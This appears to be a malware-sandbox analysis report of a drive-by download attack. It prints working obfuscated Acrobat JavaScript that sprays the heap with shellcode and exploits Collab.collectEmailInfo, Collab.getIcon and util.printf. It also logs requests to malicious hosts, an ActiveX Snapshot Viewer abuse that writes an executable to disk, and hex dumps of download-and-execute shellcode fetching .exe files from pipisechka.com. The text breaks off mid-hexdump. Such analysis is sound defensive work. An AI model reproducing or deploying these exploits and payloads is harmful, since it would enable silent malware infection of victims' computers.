%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845
%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057
%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14
%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B
%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603
%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3
%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589
%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6
%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE
%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75
%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08
%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC
%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6
%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC
%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D
%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708
%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000
%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856
%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D
%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8
%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351
%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A
%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45
%u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365%u6B68%u2E61%u6F63%u2F6D
%u6C73%u6565%u2F70%u6361%u746E%u3279%u652E%u6578%u6800%u7474%u3A70%u2F2F%u6970%u6970%u6573
%u6863%u616B%u632E%u6D6F%u732F%u656C%u7065%u632F%u696C%u6B63%u702E%u7068%u723F%u003D");
  var mem_array = new Array();
  var cc = 0x0c0c0c0c;
  var addr = 0x400000;
  var sc_len = shellcode.length * 2;
  var len = addr - (sc_len + 0x38);
  var yarsp = unescape("%u9090%u9090");
  yarsp = fix_it(yarsp, len);
  var count2 = (cc - 0x400000) / addr;
  for (var count = 0; count < count2; count ++ ){
    mem_array[count] = yarsp + shellcode;
  }
  var overflow = unescape("%u0c0c%u0c0c");
  while (overflow.length < 44952){
    overflow += overflow;
  }
  this .collabStore = Collab.collectEmailInfo({
    subj : "", msg : overflow
  }
  );
}
function collab_geticon(){
  if (app.doc.Collab.getIcon){
    var arry = new Array();
    var vvpethya = unescape("
%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845
%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057
%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14
%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B
%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603
%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3
%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589
%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6
%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE
%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75
%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08
%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC
%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6
%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC
%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D
%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708
%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000
%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856
%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D
%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8
%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351
%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A
%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45
%u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365%u6B68%u2E61%u6F63%u2F6D
%u6C73%u6565%u2F70%u6867%u6D69%u7371%u2E32%u7865%u0065%u7468%u7074%u2F3A%u702F%u7069%u7369
%u6365%u6B68%u2E61%u6F63%u2F6D%u6C73%u6565%u2F70%u6C63%u6369%u2E6B%u6870%u3F70%u3D72%u0000"
    );
    var hWq500CN = vvpethya.length * 2;
    var len = 0x400000 - (hWq500CN + 0x38);
    var yarsp = unescape("%u9090%u9090");
    yarsp = fix_it(yarsp, len);
    var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
    for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
      arry[vqcQD96y] = yarsp + vvpethya;
    }
    var tUMhNbGw = unescape("%09");
    while (tUMhNbGw.length < 0x4000){
      tUMhNbGw += tUMhNbGw;
    }
    tUMhNbGw = "N." + tUMhNbGw;
    app.doc.Collab.getIcon(tUMhNbGw);
  }
}
function pdf_start(){
  var version = app.viewerVersion.toString();
  version = version.replace(/\D/g, '');
  var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
  if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && 
  varsion_array[2] < 3)){
    util_printf();
  }
  if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && 
  varsion_array[2] < 2)){
    collab_email();
  }
  if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){
    collab_geticon();
  }
}
pdf_start();

(repeated 1 time)

Writes

No writes.

Network Activity

Requests

URL	Status	Content Type
http://bertilladingman36429.blogspot.com/	200	text/html
about:blank	200	text/html
http://afsharteam1.com/win/file2.htm	200	text/html
http://pipisechka.com/sleep/news.php?s=fb71a5433b	200	text/html
http://pipisechka.com/sleep/bgrx.pdf	200	application/pdf
http://afsharteam1.com/win/setup.exe	200	application/x-msdos-program

Redirects

No redirects.

ActiveX controls

0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
	Name	Value	Count
Attributes	width	1	1
	height	1	1
	data	./cilpqxds.jpg	1

AcroPDF.PDF

No attribute setting or method call detected

AcroPDF.PDF
No attribute setting or method call detected

AcrobatJavaScript
	Name	Arg0	Arg1	Count
Methods	Collab.getIcon	N............................................................................... ................................................................................ ................................................................................ other 15840 bytes ................................................................................ ................................................................................ ................................................................................ ..................................................................		1
	Collab.getIcon	N............................................................................... ................................................................................ ................................................................................ other 15840 bytes ................................................................................ ................................................................................ ................................................................................ ..................................................................		1
	Collab.collectEmailInfo	''	e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c other 196512 bytes e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c	1
	Collab.collectEmailInfo	''	e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c other 196512 bytes e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c	1
	util.printf	%45000f	1.3E295	2

ShockwaveFlash.ShockwaveFlash.7
Name Arg0 Count
Methods

GetVariable
$version
1

ShockwaveFlash.ShockwaveFlash.7
	Name	Arg0	Count
Methods	GetVariable	$version	1

snpvw.Snapshot Viewer Control.1
	Name	Count
Methods	PrintSnapshot	1
	Name	Value	Count
Attributes	ShowNavigationButtons	false	1
	Zoom	0.0	1
	CompressedPath	c:/Program Files/Outlook Express/wab.exe	1
	AllowContextMenu	false	1
	SnapshotPath	http://pipisechka.com/sleep/cdkpsv7.exe	1

clsid:ca8a9780-280d-11cf-a24d-444553540000

No attribute setting or method call detected

clsid:ca8a9780-280d-11cf-a24d-444553540000
No attribute setting or method call detected

Shellcode and Malware

Hexadecimal	ASCII
e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 73 64 67 73 67 35 2e 65 78 65 00 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00	.....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..\|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.\|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /pipisechka.com/ sleep/sdgsg5.exe .http://pipisech ka.com/sleep/cli ck.php?r=.
e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 66 70 74 76 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 00	.....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..\|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.\|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /pipisechka.com/ sleep/fptv2.exe. http://pipisechk a.com/sleep/clic k.php?r=..
e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 67 6e 62 69 7a 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00	.....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..\|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.\|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /pipisechka.com/ sleep/gnbiz2.exe .http://pipisech ka.com/sleep/cli ck.php?r=.
e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 